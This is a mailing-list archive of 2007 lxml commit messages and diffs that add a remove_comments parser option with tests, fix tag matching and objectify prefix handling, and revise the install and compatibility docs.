lxml/trunk/src/lxml Message-ID: <20070615094922.3FD58827B@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:49:21 2007 New Revision: 44277 Modified: lxml/trunk/src/lxml/apihelpers.pxi Log: small merge from 1.3 branch: isutf8py() and _tagMatches() Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Fri Jun 15 11:49:21 2007 @@ -459,6 +459,11 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match @@ -606,9 +611,9 @@ c = s[0] if c & 0x80: is_non_ascii = 1 - if c == c'\0': + elif c == c'\0': return -1 # invalid! - if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): return -1 # invalid! s = s + 1 return is_non_ascii From scoder at codespeak.net Fri Jun 15 14:41:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:41:56 +0200 (CEST) Subject: [Lxml-checkins] r44284 - in lxml/trunk/src/lxml: . tests Message-ID: <20070615124156.21AE582B4@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:41:54 2007 New Revision: 44284 Modified: lxml/trunk/src/lxml/iterparse.pxi lxml/trunk/src/lxml/parser.pxi lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/xmlparser.pxd Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/trunk/src/lxml/iterparse.pxi ============================================================================== --- lxml/trunk/src/lxml/iterparse.pxi (original) +++ lxml/trunk/src/lxml/iterparse.pxi Fri Jun 15 14:41:54 2007 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Fri Jun 15 14:41:54 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == LXML_ITERPARSE_PARSER: # no threading @@ -690,6 +693,7 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) * resolve_entities - replace entities by their text value (default: True) @@ -700,9 +704,9 @@ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, - resolve_entities=True): + resolve_entities=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -824,14 +828,15 @@ * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes * compact - safe memory for short text content (default: True) + * remove_comments - discard comments Note that you should avoid sharing parsers between threads for performance reasons. """ def __init__(self, recover=True, no_network=True, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if remove_blank_text: Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Fri Jun 15 14:41:54 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -195,6 +207,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') Modified: lxml/trunk/src/lxml/xmlparser.pxd ============================================================================== --- lxml/trunk/src/lxml/xmlparser.pxd (original) +++ lxml/trunk/src/lxml/xmlparser.pxd Fri Jun 15 14:41:54 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) From scoder at codespeak.net Fri Jun 15 14:43:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:43:00 +0200 (CEST) Subject: [Lxml-checkins] r44285 - lxml/trunk Message-ID: <20070615124300.C4F7382B4@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:43:00 2007 New Revision: 44285 Modified: lxml/trunk/CHANGES.txt Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 15 14:43:00 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Parsers take a ``remove_comments`` keyword argument that skips over comments + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. From scoder at codespeak.net Fri Jun 15 14:46:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:46:43 +0200 (CEST) Subject: [Lxml-checkins] r44286 - lxml/trunk/src/lxml Message-ID: <20070615124643.43D9F82B6@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:46:42 2007 New Revision: 44286 Modified: lxml/trunk/src/lxml/parser.pxi Log: cleanup Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Fri Jun 15 14:46:42 2007 @@ -827,8 +827,8 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: True) * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for performance reasons. From scoder at codespeak.net Fri Jun 15 14:49:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:49:17 +0200 (CEST) Subject: [Lxml-checkins] r44287 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070615124917.9508882B6@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:49:16 2007 New Revision: 44287 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/iterparse.pxi lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 14:49:16 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Parsers take a ``remove_comments`` keyword argument that skips over comments + * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support Modified: lxml/branch/lxml-1.3/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/iterparse.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/iterparse.pxi Fri Jun 15 14:49:16 2007 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Fri Jun 15 14:49:16 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == LXML_ITERPARSE_PARSER: # no threading @@ -664,6 +667,8 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. This does not @@ -671,9 +676,10 @@ """ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, ns_clean=False, - recover=False, remove_blank_text=False, compact=True): + recover=False, remove_blank_text=False, compact=True, + remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -789,14 +795,16 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access * remove_blank_text - discard empty text nodes + * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for parformance reasons. """ def __init__(self, recover=True, no_network=False, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if recover: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 15 14:49:16 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -191,6 +203,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') Modified: lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Fri Jun 15 14:49:16 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) From scoder at codespeak.net Fri Jun 15 15:12:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 15:12:47 +0200 (CEST) Subject: [Lxml-checkins] r44288 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070615131247.867EF82AE@code0.codespeak.net> Author: scoder Date: Fri Jun 15 15:12:47 2007 New Revision: 44288 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: read-only support for xsi prefixes in objectify type annotation Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Fri Jun 15 15:12:47 2007 @@ -1011,12 +1011,13 @@ xsi_ns = "{%s}" % XML_SCHEMA_INSTANCE_NS pytype_ns = "{%s}" % PYTYPE_NAMESPACE for name, value in cetree.iterattributes(element, 3): - if name == PYTYPE_ATTRIBUTE: - if value == TREE_PYTYPE: - continue - else: - name = name.replace(pytype_ns, 'py:') - name = name.replace(xsi_ns, 'xsi:') + if '{' in name: + if name == PYTYPE_ATTRIBUTE: + if value == TREE_PYTYPE: + continue + else: + name = name.replace(pytype_ns, 'py:') + name = name.replace(xsi_ns, 'xsi:') result = result + "%s * %s = %r\n" % (indentstr, name, value) indent = indent + 1 @@ -1097,6 +1098,9 @@ if value is not None: dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is NULL and ':' in value: + prefix, value = value.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) if dict_result is not NULL: return (dict_result)._type @@ -1516,6 +1520,9 @@ if value is not None: dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is NULL and ':' in value: + prefix, value = value.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) if dict_result is not NULL: pytype = dict_result @@ -1627,7 +1634,9 @@ return _parse(f, parser) cdef object _DEFAULT_NSMAP -_DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } +_DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, + "xsi" : XML_SCHEMA_INSTANCE_NS, + "xsd" : XML_SCHEMA_NS} def Element(_tag, attrib=None, nsmap=None, _pytype=None, **_attributes): """Objectify specific version of the lxml.etree Element() factory that From scoder at codespeak.net Mon Jun 18 10:49:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 18 Jun 2007 10:49:08 +0200 (CEST) Subject: [Lxml-checkins] r44328 - in lxml/branch/lxml-1.3: . doc Message-ID: <20070618084908.A297A80E5@code0.codespeak.net> Author: scoder Date: Mon Jun 18 10:49:07 2007 New Revision: 44328 Modified: lxml/branch/lxml-1.3/INSTALL.txt lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/compatibility.txt Log: cleanup: install, compatibility, required libs (2.6.20/1.1.15) Modified: lxml/branch/lxml-1.3/INSTALL.txt ============================================================================== --- lxml/branch/lxml-1.3/INSTALL.txt (original) +++ lxml/branch/lxml-1.3/INSTALL.txt Mon Jun 18 10:49:07 2007 @@ -8,10 +8,10 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. It can be found here: +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +19,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. - -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. _`how to build lxml from source`: build.html + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). + + +Building lxml from sources +-------------------------- -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +52,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. + +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Mon Jun 18 10:49:07 2007 @@ -91,7 +91,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. Support for XML Schema and Schematron is currently incomplete in @@ -105,7 +105,8 @@ It really depends on your application, but the rule of thumb is: more recent versions contain less bugs and provide more features. -* Try to use versions of both libraries that were released together. +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. * If you use XML Schema or Schematron which are still under development, the most recent version of libxml2 is usually a good bet. @@ -117,10 +118,10 @@ * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. * For the normal tree handling, however, any libxml2 version starting with - 2.6.16 should do. + 2.6.20 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to -see if a specific bug has been fixed. +see when (or if) a specific bug has been fixed. .. _`release notes of libxml2`: http://xmlsoft.org/news.html .. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html Modified: lxml/branch/lxml-1.3/doc/compatibility.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/compatibility.txt (original) +++ lxml/branch/lxml-1.3/doc/compatibility.txt Mon Jun 18 10:49:07 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! - -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. * etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. + +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. * The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. + The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + correspondents to ``pi.target + " " + pi.text`` in lxml.etree. * Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element. This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. Note that lxml can deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. From scoder at codespeak.net Mon Jun 18 13:39:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 18 Jun 2007 13:39:03 +0200 (CEST) Subject: [Lxml-checkins] r44336 - in lxml/trunk: . doc Message-ID: <20070618113903.18BDA80C3@code0.codespeak.net> Author: scoder Date: Mon Jun 18 13:39:01 2007 New Revision: 44336 Modified: lxml/trunk/INSTALL.txt lxml/trunk/doc/FAQ.txt lxml/trunk/doc/compatibility.txt Log: doc merge from 1.3: build, install, compatibility, FAQ Modified: lxml/trunk/INSTALL.txt ============================================================================== --- lxml/trunk/INSTALL.txt (original) +++ lxml/trunk/INSTALL.txt Mon Jun 18 13:39:01 2007 @@ -8,10 +8,10 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. It can be found here: +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +19,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. - -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. _`how to build lxml from source`: build.html + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). + + +Building lxml from sources +-------------------------- -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +52,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. + +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of 